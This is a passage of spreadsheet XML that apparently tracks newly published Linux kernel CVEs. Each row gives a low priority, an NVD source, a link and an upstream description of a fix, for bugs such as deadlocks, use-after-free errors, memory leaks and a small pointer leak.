      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90208</t>
        </is>
      </c>
      <c r="D576" s="5" t="inlineStr"/>
      <c r="E576" s="5" t="inlineStr"/>
      <c r="F576" s="5" t="inlineStr"/>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="inlineStr"/>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr"/>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q576" s="5" t="inlineStr"/>
      <c r="R576" s="5" t="inlineStr"/>
      <c r="S576" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clocksource/drivers/samsung_pwm: Switch to raw_spinlock_t type
Samsung PWM timer might be used as a clock source on some legacy systems.
When PREEMPT_RT is enabled on ARM, regular spinlock is converted to a
sleeping lock (mutex-based), which must not be used in atomic context
such as hard interrupt handlers. Switch the samsung_pwm_lock to the
raw_spinlock, which remains a true non-sleeping spinlock even
under PREEMPT_RT.</t>
        </is>
      </c>
      <c r="T576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90208</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90209</t>
        </is>
      </c>
      <c r="D577" s="5" t="inlineStr"/>
      <c r="E577" s="5" t="inlineStr"/>
      <c r="F577" s="5" t="inlineStr"/>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="inlineStr"/>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q577" s="5" t="inlineStr"/>
      <c r="R577" s="5" t="inlineStr"/>
      <c r="S577" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/debug: Fix deadlock during unregister
Unregistering an s390dbf debug area while one of the associated debugfs
files is being written to can cause a deadlock:
$ echo &gt;.../vmur/level    $ rmmod vmur
===================================================
debugfs write
debugfs_file_get()
                          debug_unregister()
                          mutex_lock(debug_mutex)
                          debugfs_remove()
                          wait for debugfs_file_put()
debug_file_ops.write()
debug_input()
mutex_lock(debug_mutex) ==&gt; DEADLOCK
Fix this by splitting debug_unregister() into an s390dbf and debugfs
part, and running only the s390dbf part with debug_mutex locked.</t>
        </is>
      </c>
      <c r="T577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90209</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90210</t>
        </is>
      </c>
      <c r="D578" s="5" t="inlineStr"/>
      <c r="E578" s="5" t="inlineStr"/>
      <c r="F578" s="5" t="inlineStr"/>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="inlineStr"/>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr"/>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q578" s="5" t="inlineStr"/>
      <c r="R578" s="5" t="inlineStr"/>
      <c r="S578" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix UAF in bpf_trampoline_multi_attach_free on update failure
When bpf_trampoline_update() fails before modify_fentry_multi()/
unregister_fentry_multi() is called, cur_image is unchanged
(cur_image == old_image) and ftrace still calls into it.  Freeing
old_image in that case causes a UAF.
Only free old_image when it differs from cur_image.</t>
        </is>
      </c>
      <c r="T578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90210</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90211</t>
        </is>
      </c>
      <c r="D579" s="5" t="inlineStr"/>
      <c r="E579" s="5" t="inlineStr"/>
      <c r="F579" s="5" t="inlineStr"/>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="inlineStr"/>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q579" s="5" t="inlineStr"/>
      <c r="R579" s="5" t="inlineStr"/>
      <c r="S579" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, s390: Clear fetch destination on faulting arena atomic
Same missing register clear as on riscv64. A RMW atomic on an arena pointer
is converted to BPF_PROBE_ATOMIC and gets an exception table entry, but
bpf_jit_probe_atomic_pre() only fills in the arena base and the probe
offset, leaving probe-&gt;reg at the -1 that bpf_jit_probe_init() set, which
bpf_jit_probe_post() writes into the entry and ex_handler_bpf() then reads
back as "there is nothing to clear".
That is right for a plain BPF_{ADD,AND,OR,XOR}, which only writes memory,
but an RMW carrying BPF_FETCH also reads the old value into a register:
src_reg for BPF_{ADD,AND,OR,XOR} | BPF_FETCH and BPF_XCHG, and r0 for
BPF_CMPXCHG. So on a fault over an unmapped arena page the program resumes
at the landing pad with whatever that register held before the atomic
instead of the 0 that every other BPF_PROBE_* access delivers.
Fill probe-&gt;reg in from bpf_atomic_load_reg(). Unlike x86-64 and arm64,
s390x does not report arena violations from its exception handler, so there
is no access direction to correct here, only the missing register clear.</t>
        </is>
      </c>
      <c r="T579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90211</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90212</t>
        </is>
      </c>
      <c r="D580" s="5" t="inlineStr"/>
      <c r="E580" s="5" t="inlineStr"/>
      <c r="F580" s="5" t="inlineStr"/>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q580" s="5" t="inlineStr"/>
      <c r="R580" s="5" t="inlineStr"/>
      <c r="S580" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm64/efi: Avoid voluntary preemption with efi_mm installed
Gus reports a bad kernel memory access when using software PAN
(CONFIG_ARM64_SW_TTBR0_PAN=y) on a machine with support for EFI runtime
services:
  Unable to handle kernel access to user memory outside uaccess routines
    at virtual address 00000000f322ff30
  Mem abort info:
    ESR = 0x0000000096000004
    FSC = 0x04: level 0 translation fault
  Internal error: Oops: 0000000096000004 [#1]  SMP
  Workqueue: efi_rts_wq efi_call_rts
  pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
  pc : efi_call_rts+0xd8/0x288
  Call trace:
   efi_call_rts+0xd8/0x288 (P)
   process_one_work+0x178/0x4f8
   worker_thread+0x194/0x328
This is because the fpsimd context management code called from
__efi_fpsimd_begin() can preempt voluntarily, returning later to the EFI
code with an incorrect value for TTBR0_EL1 thanks to the deferred mm
switching used by the software PAN implementation.
Since EFI runtime services cannot preempt voluntarily and because the
fpsimd switching code does not rely on the TTBR0_EL1 mappings, simply
reorder the fpsimd switch so that it occurs before we change the
page-table.</t>
        </is>
      </c>
      <c r="T580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90212</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90213</t>
        </is>
      </c>
      <c r="D581" s="5" t="inlineStr"/>
      <c r="E581" s="5" t="inlineStr"/>
      <c r="F581" s="5" t="inlineStr"/>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q581" s="5" t="inlineStr"/>
      <c r="R581" s="5" t="inlineStr"/>
      <c r="S581" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firewire: core: fix memory leak in error path of build_tree()
In the error path of build_tree(), node instances can remain in the local
linked list when the function returns.
Whenever an invalid value is detected in the self ID sequence, each
allocated node instance is either an entry in the linked list or an
entry in the ports array of its parent node. Therefore, the allocate
node instances can be safely released by traversing the linked list from
its head.
Release the remaining node instances with for_each_fw_node() before
returning to the caller.</t>
        </is>
      </c>
      <c r="T581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90213</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90214</t>
        </is>
      </c>
      <c r="D582" s="5" t="inlineStr"/>
      <c r="E582" s="5" t="inlineStr"/>
      <c r="F582" s="5" t="inlineStr"/>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q582" s="5" t="inlineStr"/>
      <c r="R582" s="5" t="inlineStr"/>
      <c r="S582" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: xilinx: formatter_pcm: fix stream_data leak on open error
In xlnx_formatter_pcm_open(), stream_data is allocated and
adata-&gt;play_stream or adata-&gt;capture_stream is assigned early.  If a
later step, such as snd_pcm_hw_constraint_step() or
snd_pcm_hw_constraint_integer(), fails, the function returns the error
immediately.  ALSA does not call the close callback when open fails, so
stream_data is leaked and the stream pointer is left dangling, pointing
to a substream that ALSA frees.  A later interrupt would then call
snd_pcm_period_elapsed() on the freed substream.
Free stream_data and clear the stream pointer on the error paths.</t>
        </is>
      </c>
      <c r="T582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90214</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90215</t>
        </is>
      </c>
      <c r="D583" s="5" t="inlineStr"/>
      <c r="E583" s="5" t="inlineStr"/>
      <c r="F583" s="5" t="inlineStr"/>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="inlineStr"/>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q583" s="5" t="inlineStr"/>
      <c r="R583" s="5" t="inlineStr"/>
      <c r="S583" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: ubi: Release device reference on busy detach
ubi_detach_mtd_dev() obtains a device reference through ubi_get_device()
before checking whether the UBI device is busy. The busy return path drops
ubi-&gt;ref_count but leaves the device reference held, so the device object
cannot be released after a later detach.
Drop the device reference before returning -EBUSY.</t>
        </is>
      </c>
      <c r="T583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90215</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90216</t>
        </is>
      </c>
      <c r="D584" s="5" t="inlineStr"/>
      <c r="E584" s="5" t="inlineStr"/>
      <c r="F584" s="5" t="inlineStr"/>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="inlineStr"/>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q584" s="5" t="inlineStr"/>
      <c r="R584" s="5" t="inlineStr"/>
      <c r="S584" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ubi: Fix rollback for explicit UBI device numbers
ubi_init_attach() rolls back module initialization failures by scanning
ubi_devices[0..i-1], where i is the mtd= parameter index. That assumes
the parameter index matches the UBI device number.
That assumption is not true when mtd= specifies an explicit ubi_num. A
successfully attached device can be stored at a higher ubi_devices[]
slot, and a later failure can miss it during rollback.
Scan the full ubi_devices[] array and detach by the actual array index,
matching the way UBI devices are stored.</t>
        </is>
      </c>
      <c r="T584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90216</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90217</t>
        </is>
      </c>
      <c r="D585" s="5" t="inlineStr"/>
      <c r="E585" s="5" t="inlineStr"/>
      <c r="F585" s="5" t="inlineStr"/>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="inlineStr"/>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q585" s="5" t="inlineStr"/>
      <c r="R585" s="5" t="inlineStr"/>
      <c r="S585" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Compare iterator types during state pruning
An iterator stack slot can be MEM_RCU or PTR_UNTRUSTED. These states
must not be equal, or the verifier can prune an unsafe path.
Compare the pointer type for STACK_ITER slots.</t>
        </is>
      </c>
      <c r="T585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90217</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90218</t>
        </is>
      </c>
      <c r="D586" s="5" t="inlineStr"/>
      <c r="E586" s="5" t="inlineStr"/>
      <c r="F586" s="5" t="inlineStr"/>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="inlineStr"/>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q586" s="5" t="inlineStr"/>
      <c r="R586" s="5" t="inlineStr"/>
      <c r="S586" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/cma: Fix WARNING in res_to_rt
syzbot reported a WARN_ON(!res-&gt;dev) in res_to_rt() triggered via
addr_handler() during asynchronous address resolution:
"
WARNING: drivers/infiniband/core/restrack.c:138 at res_to_rt+0x1c4/0x230
CPU#1: kworker/u8:4/59
Modules linked in:
CPU: 1 UID: 0 PID: 59 Comm: kworker/u8:4 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: Google Compute Engine, BIOS Google 07/24/2026
Workqueue: ib_addr process_one_req
RIP: 0010:res_to_rt+0x1c4/0x230 drivers/infiniband/core/restrack.c:138
RSP: 0018:ffffc9000201f850 EFLAGS: 00010293
RAX: ffffffff88d00ce5 RBX: ffff88807f0fd4f8 RCX: ffff88801e6e0000
RDX: 0000000000000000 RSI: ffffffff8fd996f0 RDI: 0000000000000003
RBP: 0000000000000000 R08: ffff88801e6e0000 R09: 000000000000000a
R10: 0000000000000009 R11: 0000000000000000 R12: dffffc0000000000
R13: 1ffff1100fe1fa9f R14: 0000000000000000 R15: 0000000000000003
FS:  0000000000000000(0000) GS:ffff888125012000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00001d559c3d2000 CR3: 0000000077c4c000 CR4: 00000000003526f0
Call Trace:
 &lt;TASK&gt;
 rdma_restrack_add+0x5a/0x8a0 drivers/infiniband/core/restrack.c:236
 addr_handler+0x41a/0x5a0 drivers/infiniband/core/cma.c:3534
 process_one_req+0x2eb/0x540 drivers/infiniband/core/addr.c:624
 process_one_work kernel/workqueue.c:3375 [inline]
 process_scheduled_works+0xc4e/0x1630 kernel/workqueue.c:3458
 worker_thread+0xa47/0xfb0 kernel/workqueue.c:3539
 kthread+0x388/0x470 kernel/kthread.c:436
 ret_from_fork+0x514/0xb70 arch/x86/kernel/process.c:158
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
 &lt;/TASK&gt;
"
In addr_handler(), cma_acquire_dev_by_src_ip() is called to populate
id_priv-&gt;cma_dev and bind the associated ib_device to id_priv-&gt;id.device.
If cma_acquire_dev_by_src_ip() returns an error (non-zero status), the ID
remains unassociated with any RDMA device.
Previously, rdma_restrack_add(&amp;id_priv-&gt;res) was invoked unconditionally
even when cma_acquire_dev_by_src_ip() failed, passing a resource with a
NULL dev pointer and triggering the WARN_ON assertion in res_to_rt().
Fix this by only adding the resource to restrack when acquiring the device
succeeds.</t>
        </is>
      </c>
      <c r="T586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90218</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90219</t>
        </is>
      </c>
      <c r="D587" s="5" t="inlineStr"/>
      <c r="E587" s="5" t="inlineStr"/>
      <c r="F587" s="5" t="inlineStr"/>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="inlineStr"/>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr"/>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q587" s="5" t="inlineStr"/>
      <c r="R587" s="5" t="inlineStr"/>
      <c r="S587" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/cxgb4: Free debugfs on registration failure
c4iw_alloc() creates the per-device debugfs tree (dev-&gt;debugfs_root via
setup_debugfs()), but it is removed only in c4iw_remove(), not in
c4iw_dealloc().  When RDMA device registration fails, the registration
worker's err_dealloc_ctx path calls c4iw_dealloc() directly, bypassing
c4iw_remove(), so the debugfs dentries leak and outlive the freed
c4iw_dev.
Move debugfs_remove_recursive() into c4iw_dealloc() so every path that
frees ctx-&gt;dev also removes its debugfs tree.</t>
        </is>
      </c>
      <c r="T587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90219</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90220</t>
        </is>
      </c>
      <c r="D588" s="5" t="inlineStr"/>
      <c r="E588" s="5" t="inlineStr"/>
      <c r="F588" s="5" t="inlineStr"/>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="inlineStr"/>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr"/>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q588" s="5" t="inlineStr"/>
      <c r="R588" s="5" t="inlineStr"/>
      <c r="S588" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: seq: Don't leak the extension cell pointer in the bounce payload
The bounce_error_event() embeds the failed event in the bounce payload
by pointing data.ext.ptr at it.  When that event is a queued
variable-length event, its own data.ext.ptr holds the address of its
first extension cell, put there by snd_seq_event_dup().  The payload
goes out verbatim through snd_seq_expand_var_event(), so the address
reaches userspace.
That is the same address commit 705dd6dcbc0e ("ALSA: seq: Clear
variable event pointer on read") removed from the event header.  The
read path still clears it there, just above the call that expands the
payload.
Embed a sanitised copy instead, treated exactly as snd_seq_read()
treats the header.  A stack copy is enough because delivery is
synchronous and snd_seq_event_dup() copies before returning.
An unprivileged client reaches this by setting SNDRV_SEQ_FILTER_BOUNCE,
queueing a variable-length event to a port that does not exist and
reading the bounce back.  Eight bytes on 64-bit, from its own pool.</t>
        </is>
      </c>
      <c r="T588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90220</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90221</t>
        </is>
      </c>
      <c r="D589" s="5" t="inlineStr"/>
      <c r="E589" s="5" t="inlineStr"/>
      <c r="F589" s="5" t="inlineStr"/>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="inlineStr"/>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q589" s="5" t="inlineStr"/>
      <c r="R589" s="5" t="inlineStr"/>
      <c r="S589" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: fix use of uninitialized memory in CORE_INIT_RSP parsing
nci_core_init_rsp_packet_v1() and nci_core_init_rsp_packet_v2() parse
the CORE_INIT_RSP packet without validating that the skb contains
enough data. A malformed response (e.g. injected via virtual_ncidev)
can declare a large num_supported_rf_interfaces while providing
insufficient data, causing reads of uninitialized slab memory. This
is later used in nci_init_complete_req(), triggering a KMSAN
uninit-value warning.
Add skb length checks before accessing packet fields:
- Validate the skb has at least 1 byte for the status field.
- Validate the skb can hold the fixed-size header before parsing.
- In v2, bounds-check each variable-length rf_interface entry and its
  extension parameters within the parsing loop.
- In v1, verify the skb is large enough for both the variable-length
  rf_interfaces array and the trailing rsp_2 structure.</t>
        </is>
      </c>
      <c r="T589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90221</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90222</t>
        </is>
      </c>
      <c r="D590" s="5" t="inlineStr"/>
      <c r="E590" s="5" t="inlineStr"/>
      <c r="F590" s="5" t="inlineStr"/>
      <c r="G590" s="5" t="inlineStr"/>
